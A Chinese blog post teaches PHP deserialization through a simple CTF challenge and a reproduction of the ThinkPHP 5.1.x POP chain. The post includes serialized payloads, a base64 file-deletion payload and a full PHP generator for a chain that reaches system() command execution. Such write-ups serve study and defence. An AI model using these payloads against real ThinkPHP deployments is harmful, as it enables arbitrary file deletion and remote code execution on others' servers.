PHP反序列化--简单ctf题--pop链(thinkphp5.1.X)漏洞复现

最新推荐文章于 2025-04-14 19:45:13 发布
最新推荐文章于 2025-04-14 19:45:13 发布
阅读量4.8k 收藏 17
点赞数 3
文章标签: thinkphp 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cainiao17441898/article/details/118439377
版权

前言:

PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。
__construct 当一个对象创建时被调用
__destruct 当一个对象销毁时被调用
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于从不可访问的属性读取数据
__set() 用于将数据写入不可访问的属性
__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__toString() 把类当作字符串使用时触发,返回值需要为字符串
__invoke() 当脚本尝试将对象调用为函数时触发
更多魔术方法详见:https://www.php.net/manual/zh/language.oop5.magic.php

CTF

先从简单的ctf题开始。这边自己写了个简单的序列化题。
解题思路:$file参数可控,传入被反序列化之后file=flag.php的序列化值。show_resource就会把flag.php中的代码高亮显示出来。但是这里存在__wakeup函数。会在我们反序列化的时候把file又给改成ctf.php。
在这里插入图片描述绕过__wakeup()魔术方法 调用 unserilize() 方法成功地重新构造对象后,如果 class 中存在 __wakeup 方法,会调用 __wakeup 方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过 __wakeup 的执行。
所以只需要使传递的元素个数大于实际的个数就行。
O:6:“xuegod”:2:{s:12:“xuegodfile”;s:8:“flag.php”;}。但是发现并没有成功绕过。
在这里插入图片描述这是因为xuegodfile长度是12中,中间还有空格。在URL中空格是%00。
O:6:“xuegod”:2:{s:12:"%00xuegod%00file";s:8:“flag.php”;}或者O:6:“xuegod”:2:{S:12:"\00xuegod\00file";s:8:“flag.php”;}这里的S是指以二进制的方式去传入数据。
在这里插入图片描述

thinkphp5.1.X中的反序列化漏洞(pop链)

这题有点恶心了,主要学习下pop链的思想。
打开的时候要是报错了,就调整一下php的版本。
ThinkPHP只是一个开发框架,所以漏洞利用需要我们手工添加一个用户可控的unserialize参数。

$s = base64_decode($_POST['key']); unserialize($s);

下面的报错是正常的现象。
在这里插入图片描述

ThinkPHP反序列化漏洞任意文件删除
漏洞存在位置 think5.1.37\thinkphp\library\think\process\pipes\Windows.php
漏洞分析:
__destruct():
在这里插入图片描述这里的file使我们可控的,所以只要提交对的文件路径我们就可以实任意文件的删除操作。
在这里插入图片描述在这里插入图片描述得出TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtzOjEzOiJjOlx4dWVnb2QudHh0Ijt9fQ==
传入我们写入存在可控点的文件中(index.php)。他不报错了。并且文件(delete.txt)也被删除了。
在这里插入图片描述下一步就是想办法扩大漏洞面。(这个就有点恶心了)
前言:

反序列化漏洞的常见起点:
__wakeup 一定会调用
__destruct 一定会调用
__toString 当一个对象被反序列化后又被当做字符串使用
反序列化漏洞的常见中间跳板:
__toString 当一个对象被当做字符串使用
__get 读取不可访问或不存在属性时被调用
__set 当给不可访问或不存在属性赋值时被调用
__isset 对不可访问或不存在的属性调用isset()或empty()时被调用
反序列化漏洞的常见终点:
__call 调用不可访问或不存在的方法时被调用
call_user_func 一般php代码执行都会选择这里
call_user_func_array 一般php代码执行都会选择这里

在这里插入图片描述file_exits这个函数是一个php的内置函数。要求传入的是一个字符串。我们之前传入的是一个文件路径的字符串,如果我们传入的是一个对象,那么就会调用魔术方法:__toString方法。那就先跟踪下__toString方法。
发现了一箩筐,挨个看看。
在这里插入图片描述有两个__toString方法一个一个慢慢看:
这里会返回render()这个函数并且强制将其返回值转换成string类型。那就去看看render函数。
在这里插入图片描述哦吼,发现它是个抽象函数。那就难以利用了。
在这里插入图片描述那么就还剩这个__toString方法。这里return了toJson函数的返回值。
在这里插入图片描述toJson():在这里插入图片描述我们需要找到一个$可控变量->方法(参数可控)的点,寻找$可控变量->方法(参数可控)是为了构造触发执行代码的相关函数。
toArry:getRelation这个函数我们利用不了。
在这里插入图片描述
在这里插入图片描述
可利用的地方:在这里插入图片描述跟踪getArry方法,发现 $value = $this->getData($name);那么再去跟踪getData方法。
在这里插入图片描述
最终$relation=$this->data[$name];data是在类中定义的,$this->data可控,所以$relation->visible($name);可控。 这里类的定义是Trait而不是class所以需要找到一个子类同时继承了Attribute和Conversion。
这里整理一下思路:
$append=qiyou=>[“1”] → $key=qiyou $name=[“1”]
带入POC中的值 $this->getAttr($key); → $this->getAttr(qiyou);
getAttr(qiyou) <= $this->getData(qiyou);
getData函数中通过$this->data取值,data属性的定义private $data = []; return $this->data[qiyou];
所以我们只需要通过构造data[]的值利用getData函数就能控制relation的值了。
找到了一个$可控变量->方法(参数可控)的点。$relation->visible($name);
在这里插入图片描述下面我们需要找到个能利用__call并且不能有$relation->visible($name);的一个类。查找之后发现了Request.php这个类。举个例子:new Request()->visible([“1”]); 就能调用出__call方法了。这里又逮到hook这个变量使我们可控的。

 public function __call($method, $args)
    {
        if (array_key_exists($method, $this->hook)) {
            array_unshift($args, $this);
            return call_user_func_array($this->hook[$method], $args);
        }

        throw new Exception('method not exists:' . static::class . '->' . $method);
    }

如何利用call_user_func_array这个回调函数呢?我一开始的想法是为啥不能直接调用system,参数:id之类的,后面发现不行。执行这个函数的条件是得满足method这个参数得在hook这个可控数组里面,也就是得是:system(system)的形式。这样是会报错的,但是在审计Request中的代码的时候发现:call_user_func这个敏感函数但是发现这里的参数都不可控。并且他是一个私有函数。那么就在本类中找一下有没有存在调用这个函数的其他函数方法发并且其形参可利用。

 private function filterValue(&$value, $key, $filters)
    {
        $default = array_pop($filters);

        foreach ($filters as $filter) {
            if (is_callable($filter)) {
                // 调用函数或者方法过滤
                $value = call_user_func($filter, $value);

这里发现了input方法调用了这个方法,但是它的三个参数都不可用。那么就找找谁还调用了input这个参数。
在这里插入图片描述发现了param函数调用了input函数不出意外的三个参数还是用不了。接着找。
在这里插入图片描述这里发现了isAjax这个函数:最主要的是发现var_ajax这个参数可控。
在这里插入图片描述也就是说:
public function isAjax($ajax = false)
调用param
$this->param($this->config[‘var_ajax’])

param $name可控 $name=var_ajax的值
public function param($name = ‘’, $default = null, $filter = ‘’)

input $name可控
public function input($data = [], $name = ‘’, $default = null, $filter = ‘’)

这里发现该函数通过get方式获取参数并传递给input。也就是说可控参数变成input[$data=$this->param,$name=$his->config[‘var_ajax’]],所以此时已经满足filterValue所有形参可控这个条件。
在这里插入图片描述回到input这个函数:这里发现$data=$this->param这个参数传进来之后不是直接使用的,会经过getData这个函数。所以需要跟踪一下这个函数。
在这里插入图片描述
explode,例如从url中传入:hyp=sgx
$data=$data[$value]=$data[hyp]=sgx。
在这里插入图片描述还有一个参数filter:这里我们只需要使filter=system(我们要调用的参数)。

在这里插入图片描述在这里插入图片描述最后回到filterValue这个函数中
arry_pop:会删除$filter中的最后一个元素,也就是filter[0]=system,system[1]=$default中的system[1]。
到这里我们就通过使用其他函数去调用我们想要利用的函数,成功的把本来不可控的参数,转换成可控的参数了。

<?php
//new Request调用__call()
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["hyp"=>["1"]];
        $this->data = ["hyp"=>new Request()];
    }
}
// call_user_func(system,calc);
 class Request
 {
     protected $hook = [];
     protected $filter = "system";
     protected $config = [
         // 表单ajax伪装变量
       'var_ajax' => '_ajax',  ];
     function __construct(){
         $this->filter = "system";
         $this->config = ["var_ajax"=>'hyp'];
         $this->hook = ["visible"=>[$this,"isAjax"]];
     }
 }
 //Windows入口 files对象通过file_exists转换为字符串则触发__toString()方法。
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];
    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
//输出序列化payload
echo base64_encode(serialize(new Windows()));
?>
?>

在这里插入图片描述总结:反序列化pop链的应用主要在于,把不可控的变量通过其他函数的调用,使不可用的变为可用的变量。thinkphp的这个漏洞的利用链:
\thinkphp\library\think\process\pipes\Windows.php - > __destruct()
\thinkphp\library\think\process\pipes\Windows.php - > removeFiles()
Windows.php: file_exists()
thinkphp\library\think\model\concern\Conversion.php - > __toString()
thinkphp\library\think\model\concern\Conversion.php - > toJson()
thinkphp\library\think\model\concern\Conversion.php - > toArray()
thinkphp\library\think\Request.php - > __call()
thinkphp\library\think\Request.php - > isAjax()
thinkphp\library\think\Request.php - > param()
thinkphp\library\think\Request.php - > input()
thinkphp\library\think\Request.php - > filterValue()

【网络安全 | CTF】记一次PHP序列化反序列化详析
等风来
08-24 5791
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
浅谈ThinkPH5.0和5.1反序列化利用分析
kali_Ma的博客
01-04 1292
前言 本文将总结分析ThinkPHP5.0和5.1中的反序列化利用,一方面以备不时之需,另一方面算是对php反序列化的深入学习。 其中TP5.0的利用会复杂很多,所以本文会先介绍TP5.1的利用。本文主要分析的代码是ThinkPHP5.0.24和ThinkPHP5.1.41,分别是ThinkPHP5.0和5.1的最终版本 代码分析 该条pop入口在think\process\pipes\Windows类中,利用__destruct()触发 在file_exists($filename)时,可触发__
CTF php反序化简单的入门题目 (对初学者非常友好,单一考点)
AAAAAAAAAAAA66的博客
12-28 2408
地址 :要注册的 http://www.whalwl.site:8026/ 题目非常明了,只有一个类site 和一个魔法函数_destruct unserialize(反序化前自动调用_destruct) 关键 在$a($this->title) 明显的是a参数执行(this->title) 所以在这里可以构造命令执行,利用assert函数执行system系统命令。 构造payload <?php class site{ public $url...
PHP反序列化
最新发布
ALe0721的博客
04-14 858
PHP 里,序列化是把一个对象或数组转换成字符串的过程(比如保存到文件或传输到网络),而反序列化就是把这个字符串还原成原来的变量(对象/数组)。// 序列化// 反序列化Phar(PHP Archive)是一种压缩包格式,允许 PHP 把一堆文件打包成一个.phar文件,像.zip一样可以解压,也可以当成普通文件一样 include、访问。Phar 归档中可以携带元数据(metadata),这个 metadata 是以 PHP 序列化格式保存。
PHP反序列化CTF
bwxzdjn的博客
03-25 6241
用代码审计的方式分析一道典型的存在PHP反序列化漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。
php ctf,CTF---PHP安全考
weixin_28736145的博客
03-26 793
1.弱类型比较php中有两种比较的符号 == 与 ===1
CTF-php反序列化 ()
2301_81556781的博客
09-15 1115
这个地方,正常逻辑是3只有一个字符,但是却被标注为28个,那么在反序列化的时候,就会出现报错,但是此反序列化之前会对msg的参数进行替换操作,会将4个字符的fuck替换5个关字符的loveu,这样的话本来缺少的27个字符,就会被经过增加替换而多出来的27个字符顶替,正好满足136=109(love)+27(u),而后面的27个字符也就顺理成章的替换了后面的token。"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
CTFshow反序列化-web271-278
qq_52579508的博客
08-31 1451
Laravel框架反序列化提交的入口找到一个子成功执行查看flag。
CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3745
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
《从0到1CTFer成长之路》初识反序列化
weixin_46703850的博客
03-06 1308
《从0到1CTFer成长之路》初识反序列化
序列化和反序列化记录
一只菜鸡
01-28 1760
BUU CODE REVIEW\ *反序列化 md5 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try {
从一道CTF学习PHP反序列化漏洞-附件资源
03-02
从一道CTF学习PHP反序列化漏洞-附件资源
CTF-PHP反序列化漏洞4-实例理解POP(经典赛)
Eason_LYC安全白帽子的成长博客
05-08 3170
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷备赛,打下坚实的基础~
php ctf解,国际赛-N1CTF 2018-Web
weixin_34471172的博客
03-11 1056
前记N1CTF2018是由国内知名战队Nu1L战队组织,由南京赛宁提供技术支持。正好假期空余,于是便来试了试,总的来说,题目难度较高,但是由于存在非预期,所以降低了一些困难性。77777拿到题目注意几个信息点:容易发现我们需要的就是admin的password字段所以容易构造payload:flag=1111&hi= where (password like 0x25)即Update u...
CTF——Thinkphp5远程命令执行漏洞利用
qq_45521281的博客
05-03 7830
[BJDCTF 2nd]old-hack(5.0.23) 进入之后: 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞Thinkphp5远程命令执行漏洞 漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST['_meth...
CTFshow——thinkphp
D.MIND 的博客
06-12 1902
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
pop
zhhhb1005的博客
05-01 959
目录 例 流程 exp pop就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 例 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'...
PHP反序列化漏洞-CTF实例
weixin_43726831的博客
11-12 1447
PHP反序列化漏洞-CTF PHP反序列化漏洞-FIRST PHP反序列化漏洞-SECOND 1.CTF实例 CTF实例源码: strchr() 函数: 搜索字符串在另一字符串中的第一次出现,返回字符串的其余部分(从匹配点)。如果未找到所搜索的字符串,则返回 FALSE。 dirname(__FILE__)函数:表示当前文件绝对路径 //10.php <?php error_rep...
ThinkPHP 系列漏洞_thinkphp漏洞,2024年最新2024年网络安全社招面试
04-15 1347
attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。File::setTagItem($name) => File::set() => file_put_contents() => 写入 webshell。s=index/\think\Config/load&file=…// 将 webshell 写入缓存文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值